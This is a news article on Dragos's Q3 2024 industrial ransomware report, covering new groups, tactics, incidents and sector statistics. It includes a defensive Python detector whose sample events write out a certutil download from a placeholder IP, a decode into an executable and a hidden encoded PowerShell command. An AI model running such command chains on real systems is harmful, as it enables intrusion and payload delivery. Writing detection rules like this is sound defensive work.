Dragos releases Q3 2024 industrial ransomware report
The Dragos Industrial Ransomware Analysis Report Q3 2024 has revealed that the ransomware threat ecosystem remained highly active, driven by the emergence of new groups, rebranding of existing entities, the expansion of initial access broker (IAB) operations, and the proliferation of illicitly traded tools. Operators also demonstrated a growing ability to adapt to disruptions, leveraging technological advancements and strategic realignments to sustain their operations.
A critical shift occurred this quarter as dominant groups like LockBit faced significant setbacks following coordinated international law enforcement actions, including Operation Cronos, which dismantled key infrastructure components. This led to a decline in LockBit’s activities and forced affiliates, such as Velvet Tempest, to transition to other groups like RansomHub.
The ransomware-as-a-service (RaaS) model continued to mature, relying increasingly on IABs to exploit vulnerabilities, misconfigurations and stolen credentials to facilitate entry into targeted environments. This initial access enabled ransomware groups to scale their operations by focusing on payload deployment and extortion strategies. This industrialisation of ransomware has continuously lowered barriers to entry for new actors, fostering a competitive and dynamic threat environment.
Additionally, geopolitical tensions introduced new dimensions to ransomware threats. The conflicts in the Middle East and Eastern Europe spurred a rise in hacktivist personas using ransomware to disrupt industrial operations. Unlike traditional financially motivated campaigns, these actors appear to prioritise operational sabotage, posing a distinct and potentially catastrophic risk to critical infrastructure.
Emerging ransomware threats
Dragos observed the emergence of several new ransomware groups targeting industrial organisations and exploiting vulnerable remote and virtual network applications through initial access and post-compromise techniques. Notable groups included 3am, APT73, Eldorado, Fog, Helldown, RansomHub and Sarcoma, among others. They employed advanced tactics to compromise operationally critical IT systems, prioritising industries with low tolerance for downtime, such as industrial operations. By targeting environments where disruptions cause cascading impacts, they increased the likelihood of ransom payments, with the urgency of uninterrupted services pressuring victims.
While some groups were entirely new, others, like APT73, appear to be rebranded versions of existing entities, such as remnants of LockBit affiliates. APT73 repurposed familiar techniques while introducing new payloads to evade detection and maintain a foothold in the ransomware ecosystem. This reflects the adaptability and resilience of ransomware operations, as groups continually evolve tactics and infrastructure to remain effective and profitable despite heightened scrutiny from defenders and law enforcement.
Advanced lateral movement and persistence techniques
Dragos observed ransomware groups expanding their lateral movement capabilities by combining traditional methods with advanced persistence mechanisms:
- Living-off-the-land techniques (LOLTs): Actors evaded detection by mimicking legitimate network activity, leveraging legitimate administrative tools like PowerShell, certutil.exe and PsExec.
- Abuse of remote access tools: Tools like AnyDesk and Quick Assist were exploited to establish persistent access, often paired with custom scripts to disable antivirus protection.
- Targeting virtual environments: Groups like Eldorado and Play developed Linux lockers specifically to target VMware ESXi environments, encrypting critical virtual machine files and disabling active VMs, minimising pre-encryption dwell time while disrupting operations.
- Integration of advanced malware: Groups such as Black Basta adopted custom malware, backdoor tools like SilentNight, tunnelling utilities like PortYard, and memory-only droppers like DawnCry to evade endpoint detection and maintain persistence.
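As an added example (not code from the Dragos report), the following Python runs simple detection rules for the living-off-the-land patterns named above (certutil.exe downloads and decodes, PsExec service execution, encoded PowerShell) over constructed process-creation log events. The event fields, host names and IP address are assumptions modelled on Sysmon Event ID 1 / Windows 4688 telemetry, and the rules key on command lines and parent/child relationships rather than binary names alone, because the same tools have routine administrative uses.

```python
import re

# Constructed, simplified process-creation events (fields modelled on Sysmon
# Event ID 1 / Windows 4688). Sample data only, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "eng-ws-01", "parent": "explorer.exe", "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.10/x.txt C:\\Users\\Public\\x.txt"},
    {"host": "eng-ws-01", "parent": "cmd.exe", "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -decode C:\\Users\\Public\\x.txt C:\\Users\\Public\\x.exe"},
    {"host": "hmi-02", "parent": "services.exe", "image": "C:\\Windows\\PSEXESVC.exe",
     "cmdline": "C:\\Windows\\PSEXESVC.exe"},
    {"host": "hmi-02", "parent": "PSEXESVC.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},  # placeholder base64
    {"host": "file-srv", "parent": "services.exe", "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\plc-vendor.cer"},  # benign certificate check
    {"host": "file-srv", "parent": "explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup-report.ps1"},  # benign admin script
]

# Each rule is (name, predicate over one event). Matching on arguments and
# parent process keeps routine certutil/PowerShell use out of the alerts.
RULES = [
    ("certutil remote fetch", lambda e: e["image"].lower().endswith("certutil.exe")
        and re.search(r"-urlcache|-verifyctl", e["cmdline"], re.I)
        and re.search(r"https?://", e["cmdline"], re.I)),
    ("certutil file decode", lambda e: e["image"].lower().endswith("certutil.exe")
        and re.search(r"\s-decode(hex)?\s", e["cmdline"], re.I)),
    ("PsExec service execution", lambda e: e["image"].lower().endswith("psexesvc.exe")
        or e["parent"].lower() == "psexesvc.exe"),
    ("encoded PowerShell", lambda e: "powershell" in e["image"].lower()
        and re.search(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", e["cmdline"], re.I)),
]

def detect(events):
    """Return (host, rule_name, cmdline) for every event that matches a rule."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((e["host"], name, e["cmdline"]))
    return hits

def hosts_with_chain(events):
    """Hosts where two or more distinct LOLT patterns fired: the chain of
    fetch, decode and remote execution is the signal, not any single tool."""
    seen = {}
    for host, name, _ in detect(events):
        seen.setdefault(host, set()).add(name)
    return sorted(h for h, names in seen.items() if len(names) >= 2)
```

Running `hosts_with_chain(SAMPLE_EVENTS)` on the constructed data returns the two hosts with chained activity and leaves the benign administrative events on `file-srv` unflagged.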
While no direct attacks on operational technology (OT) assets were observed, ransomware-induced IT downtime often disrupted industrial processes, leading to financial losses, production delays and safety risks. The interconnected nature of IT and OT networks amplified these disruptions.
Dragos assesses with moderate confidence that ransomware activity targeting industrial organisations will continue to escalate, driven by both financially and ideologically motivated actors. The shift towards operational sabotage, particularly by hacktivist personas, compounds these risks and blurs the line between cybercrime and cyberwarfare, which requires stronger defences for ICS and OT environments.
Ransomware impacts on industrial organisations
Ransomware attacks continued to disrupt industrial organisations, causing operational halts, financial losses and compromised data integrity.
In September 2024, oilfield services company Halliburton was breached by a RansomHub-linked threat actor, impacting invoice processing and purchase order management. Halliburton reported a US$35 million financial loss and confirmed unauthorised parties accessed and exfiltrated information from its systems.
Hacktivism and the rise of ransomware-driven operations
Dragos observed an increasing trend of hacktivist groups integrating ransomware into their operations, signalling a significant shift in tactics and impact. Groups like CyberVolk, Handala and KillSec used ransomware to amplify disruption, blurring the lines between ideological activism and financially driven cybercrime.
CyberVolk represents a troubling development. It launched a RaaS platform in June and its proprietary CyberVolk ransomware in July, deploying it in pro-Russian campaigns targeting critical infrastructure. The ransomware combines advanced encryption algorithms with payload delivery methods typically seen in financially motivated attacks. While no direct impacts on industrial organisations were observed, the growing sophistication and focus of groups like CyberVolk is concerning. The convergence of ransomware and ideological motives heightens risks to critical infrastructure, demanding increased vigilance against this evolving threat.
Regional and industry impacts
Ransomware incidents showed distinct regional variations, with North America experiencing the highest attack volume. Illustrating that ransomware remains a global threat, Oceania reported 12 incidents in the quarter, primarily targeting Australia and New Zealand in the technology, education and healthcare sectors.
The manufacturing sector was the most impacted, with 394 observed incidents accounting for 71% of all ransomware cases. Industrial control systems (ICS) equipment and engineering saw 56 incidents (10%), followed by oil and natural gas with 13 incidents (2%). Water and wastewater entities faced five incidents, while mining reported three.
Additionally, ransomware activity affected 23 unique manufacturing subsectors in Q3, a significant increase from the previous quarter. The rise in incidents underscores ransomware operators’ focus on industries critical to operational continuity and infrastructure.
Ransomware group trends, patterns and observations
Dragos’s analysis revealed significant shifts in ransomware activity, with LockBit3.0, RansomHub and Play emerging as the most active groups targeting industrial organisations.
Many groups showed marked increases in activity, highlighting the dynamic and evolving nature of the ransomware landscape. It remains unclear whether new ransomware groups are entirely new actors or rebranded versions of existing ones.
Conclusion
This quarter highlighted the evolving ransomware threat landscape. RansomHub, LockBit3.0 and Play remained prominent, while new actors exploited vulnerabilities in IT and OT environments. The industrial sector, particularly manufacturing and ICS equipment and engineering, was a key target, with operators leveraging advanced tactics and exploiting weak credential practices and vulnerabilities in remote access systems.
Organisations must prioritise strong cybersecurity measures. Monitoring critical ports, enforcing MFA, maintaining offline backups and securing remote access are essential. Enhanced personnel training and continuous assessment of network architecture are vital to counter evolving threats. As ransomware operations fragment and adapt, proactive defences, intelligence sharing and collaboration are essential to protect critical infrastructure.